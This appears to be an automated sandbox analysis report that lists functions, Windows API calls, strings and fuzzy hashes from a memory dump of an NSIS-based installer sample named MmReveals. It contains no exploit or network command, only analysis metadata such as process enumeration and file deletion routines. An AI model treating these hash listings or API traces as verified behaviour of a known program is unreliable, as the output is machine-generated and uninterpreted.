                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID:
                          • API String ID: 4115351271-0
                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

                          Non-executed Functions

                          Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                          • GetClientRect.USER32(?,?), ref: 00405196
                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                          • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                          • CloseHandle.KERNEL32(00000000), ref: 004052C0
                          • ShowWindow.USER32(00000000), ref: 004052E7
                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                          • ShowWindow.USER32(00000008), ref: 00405333
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                          • CreatePopupMenu.USER32 ref: 00405376
                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                          • GetWindowRect.USER32(?,?), ref: 0040539E
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                          • OpenClipboard.USER32(00000000), ref: 0040540B
                          • EmptyClipboard.USER32 ref: 00405411
                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                          • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                          • CloseClipboard.USER32 ref: 0040546E
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                          • String ID: @rD$New install of "%s" to "%s"${
                          • API String ID: 2110491804-2409696222
                          • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                          • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                          Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                          • DeleteObject.GDI32(?), ref: 00404A79
                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                          • ShowWindow.USER32(00000000), ref: 00404F5B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $ @$M$N
                          • API String ID: 1638840714-3479655940
                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                          Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                          • SetWindowTextW.USER32(?,?), ref: 00404583
                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                          • String ID: 82D$@%F$@rD$A
                          • API String ID: 3347642858-1086125096
                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                          Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                          • CloseHandle.KERNEL32(?), ref: 004071E6
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                          • API String ID: 1916479912-1189179171
                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                          Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                          • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                          • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                          • FindClose.KERNEL32(?), ref: 00406E33
                          Strings
                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                          • \*.*, xrefs: 00406D03
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                          • API String ID: 2035342205-3294556389
                          • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                          • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                          Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 3581403547-784952888
                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                          Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                          Strings
                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                          • API String ID: 542301482-1377821865
                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                          Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                          • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                          Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                          • lstrlenW.KERNEL32(?), ref: 004063CC
                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                          • GlobalFree.KERNEL32(?), ref: 004064DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                          • API String ID: 20674999-2124804629
                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                          Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                          • ShowWindow.USER32(?), ref: 004054D2
                          • DestroyWindow.USER32 ref: 004054E6
                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
